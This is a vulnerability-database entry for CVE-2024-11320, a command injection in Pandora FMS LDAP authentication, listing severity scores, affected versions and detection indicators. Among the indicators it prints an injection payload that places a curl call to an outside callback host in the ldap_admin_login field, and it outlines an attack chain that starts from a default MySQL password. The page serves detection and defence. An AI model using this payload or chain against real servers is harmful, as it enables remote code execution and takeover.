cbcvebase.
CVE-2024-11320
published 2024-11-21

CVE-2024-11320: Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora…

PriorityP189critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
90.51%
99.8th percentile
Arbitrary commands execution on the server by exploiting a command injection vulnerability in the LDAP authentication mechanism. This issue affects Pandora FMS: from 700 through <=777.4

Affected

2 ranges
VendorProductVersion rangeFixed in
pandora_fmspandora_fms700 – 777.4
pandorafmspandora_fms>= 700 < 777.5777.5

Detection & IOCsextracted from sources · hover to see the quote

urlPOST /index.php?login=1
urlGET /index.php?logged=1&sec=general/logon_ok
urlGET /index.php?sec=general&sec2=godmode/setup/setup&section=auth
urlPOST /index.php?sec=general&sec2=godmode/setup/setup&section=auth
commandldap_admin_login=';curl xxxxzz.{{interactsh-url}} #
path/index.php?sec=general&sec2=godmode/setup/setup&section=auth
  • Exploit POST to /index.php?sec=general&sec2=godmode/setup/setup&section=auth with Content-Type application/x-www-form-urlencoded containing injected shell metacharacters in the ldap_admin_login parameter (e.g., ';curl ...) indicates active exploitation of CVE-2024-11320.
  • Successful exploitation response contains the string 'Correctly updated the setup options' after injecting the malicious LDAP admin login payload.
  • Attacker sets auth=ldap and fallback_local_auth=1 in the setup POST body as part of the injection chain; monitor for these parameters being set together with shell metacharacters in ldap_admin_login.
  • The Metasploit module leverages a default DB password to create a new admin user in MySQL before exploiting the LDAP command injection; monitor for unexpected MySQL connections from external IPs and new admin user creation in Pandora FMS.
  • The attack chain includes a GET to /index.php?login=1 with cookies disabled after injecting the payload, which triggers the LDAP authentication and executes the injected command server-side.
  • Affected versions are Pandora FMS v7.0NG.718 through v7.0NG.777.4; presence of these versions combined with exposed MySQL port and admin web access indicates high risk.
  • ·Exploitation requires admin-level access to the Pandora FMS web application. The Metasploit module achieves this via a default MySQL database password to create a rogue admin account, so the MySQL port must be exposed for the full automated attack chain to work remotely.
  • ·The injection point is specifically the ldap_admin_login field in the LDAP authentication configuration page; the vulnerability is only reachable when LDAP authentication is being configured or updated.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.06.9MEDIUMCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:L/VI:H/VA:L/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:C/RE:M/U:Amber
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.